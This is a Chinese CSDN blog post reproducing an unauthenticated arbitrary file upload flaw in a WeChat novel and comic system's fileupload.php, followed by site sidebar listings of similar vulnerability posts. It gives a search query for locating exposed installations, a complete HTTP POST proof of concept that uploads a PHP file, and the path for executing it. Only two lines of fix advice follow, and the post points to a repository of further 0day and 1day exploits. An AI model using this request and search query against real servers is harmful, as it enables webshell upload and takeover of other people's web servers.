【漏洞复现】微信公众号小说漫画系统 fileupload.php 任意文件上传

最新推荐文章于 2024-11-10 16:59:10 发布
最新推荐文章于 2024-11-10 16:59:10 发布
阅读量1.1k 收藏 18
点赞数 24
分类专栏: 漏洞复现 文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/142764225
版权


》》》产品描述《《《

        微信公众号小说漫画系统包含前端界面、后端逻辑、数据库设计以及其他必要的功能模块,能够支持多终端访问,如微信小程序、H5网页、微信公众号以及原生APP等。系统内置了丰富的小说和漫画资源,涵盖各类题材和风格,满足不同用户的阅读需求。同时,它还支持作者入驻和作品上传,有助于促进内容生态的繁荣。

》》》漏洞描述《《《

        微信公众号小说漫画系统 fileupload.php 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

》》》搜索语句《《《

body="/Public/home/mhjs/jquery.js"

》》》漏洞复现《《《

POC

POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
 
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: image/jpeg
 
<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryj7OlOPiiukkdktZR

验证地址

/Public/webuploader/0.1.5/server/upload/info.php

》》》修复建议《《《

关闭互联网暴露面或接口设置访问权限
升级至安全版本

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

A 八方
关注
专栏目录
微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞复现
0xSec
10-08 506
微信公众号小说漫画系统 fileupload.php 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
微商城系统api.php接口存在任意文件上传漏洞
nnn2188185的博客
08-23 62
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发微商城系统
微信公众号小说漫画系统 fileupload.php 任意文件上传复现
iSee857的博客
10-10 706
接口中,存在任意文件上传漏洞,该漏洞允许未经身份验证的攻击者上传恶意文件,从而实现代码执行。这种安全隐患使得攻击者能够在服务器上写入后门程序,获取服务器权限,并最终控制整个 Web 服务器。攻击者可能借助重命名文件、伪造 MIME 类型等手段绕过文件类型限制,构造包含恶意代码的文件进行上传。一旦上传成功,攻击者便可通过访问该文件的 URL 执行其中的代码,造成严重的安全威胁。在微信公众号小说漫画系统的。上传成功后访问接口 访问文件路径进行访问。关闭互联网暴露面或接口设置访问权限。webshell上传。
微信公众号漫画系统源码 可对接微信公众号 APP打包 对接个人微信
04-04
源码概述: 修复版的掌上阅读源码,具备强大的功能和选项,适用于搭建漫画阅读平台。这个源码还支持公众号漫画功能,可以用于打包成漫画APP。
漏洞复现微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞
qq_39894062的博客
10-11 610
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞复现微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞
m0_46381222的博客
10-31 545
漏洞复现微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞
9月末-10月初新增漏洞汇总|威胁情报第|漏洞订阅
weixin_43167326的博客
10-10 703
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
奇安信天擎 rptsvr 任意文件上传
weixin_62352348的博客
01-29 568
奇安信天擎终端安全管理系统V6.7.0.4130前台文件上传漏洞(XVE-2023-24876)
漏洞复现】某小说漫画系统 fileupload.php 任意文件上传漏洞
alert['Hello World']
10-13 144
小说漫画系统 fileupload.php 文件存在一个任意文件上传漏洞。攻击者可以通过这个漏洞上传恶意文件到服务器,从而获取服务器的控制权,以及在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器,对系统安全性构成严重威胁。
漏洞复现】某小说漫画系统 fileupload2.php 任意文件上传漏洞
最新发布
alert['Hello World']
11-10 66
小说漫画系统 fileupload.php 文件存在一个任意文件上传漏洞。攻击者可以通过这个漏洞上传恶意文件到服务器,从而获取服务器的控制权,以及在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器,对系统安全性构成严重威胁。
漏洞复现】万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞
alert['Hello World']
07-27 717
万户OA-ezOFFICE DocumentEdit_unite.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统安全性。
锐捷 NBR 路由器 fileupload.php 任意文件上传
weixin_43567873的博客
03-08 292
锐捷 NBR 路由器 fileupload.php 任意文件上传
【神经科学学习笔记】基于分层嵌套谱分割(Nested Spectral Partition)模型分析大脑网络整合与分离的学习总结
Rose9614的博客
11-06 1309
需要说明的是,本文仅是笔者对NSP方法的初步尝试,主要聚焦于功能连接网络的分析。原文中还包含了结构连接网络的分析,以及功能-结构整合的深入探讨,这些都为理解大脑的组织原理提供了更全面的视角。感兴趣的小伙伴强烈建议去阅读原文~笔者也准备明天有时间再尝试计算一下局部指标。
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1051
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
yum安装zabbix5.0升级php到74的办法
hxiang613的专栏
11-08 524
难题也跟来了,php是和zabbix绑定的,卸载了rh-php72就会使得zabbix前端的相关的包不可使用,不可卸载rh-php72。当前yum安装的方式,php和zabbix耦合性太高,升级的方式可以保留数据库不动,重新编译安装zabbix,然后引用原来的数据库。将zabbix,php,http,db全部分离。公司时不时有扫描漏洞,之前发现了php漏洞,因开启防火墙,限定IP+端口,暂时躲过升级;现在,老话重提,开启了KPI考核,躲是躲不过去的了,升级吧。停止原先的zabbix服务及相关组件。
[FBCTF 2019]rceservice 详细题解
weixin_73904941的博客
11-09 1162
如果在字符串最末尾的 } 之前加上一个%0a {%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}此时 \x00-\x1F 匹配了第一个%0a 但是最后的.* 不能匹配换行符,也匹配不到换行后的 }所以不能遍历完整字符串,返回值为空,完成正则绕过//而在单行模式下$ 似乎会忽略在句尾的 %0a 所以如果%0a 添加在字符串最后的} 的后面的话依然会被匹配构造?
第11章 LAMP架构企业实战
lihuhelihu的博客
11-06 976
随着开源潮流的蓬勃发展,开放源代码的LAMP已经与J2EE和.Net商业软件形成三足鼎立之势,并且该软件开发的项目在软件方面的投资成本较低,因此受到整个IT界的关注。LAMP架构受到大多数中小企业的运维、DBA、程序员的青睐,Apache默认只能发布静态网页,而LAMP组合可以发布静态+PHP动态页面。静态页面通常指不与数据库发生交互的页面,是一种基于w3c规范的一种网页书写格式,是一种统一协议语言,所以称之为静态网页。
华为eNSP:mux-vlan
nankon_的博客
11-06 1230
一、什么是mux-vlan? Mux-vlan 是一种多路复用的虚拟局域网(Virtual Local Area Network)技术。它将多个不同的VLAN流量转发到同一个物理端口,从而实现VLAN间的互通。 在传统的以太网环境中,每个VLAN通常都有一个独立的物理接口来传输其数据。而在mux-vlan中,一个物理接口可以同时承载多个VLAN的数据流量。这种技术可以帮助节省网络设备的物理接口,降低网络成本。 mux-vlan通过使用VLAN标签来区分不同的网络流量。当数据包到达交换机时,交换机根据数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值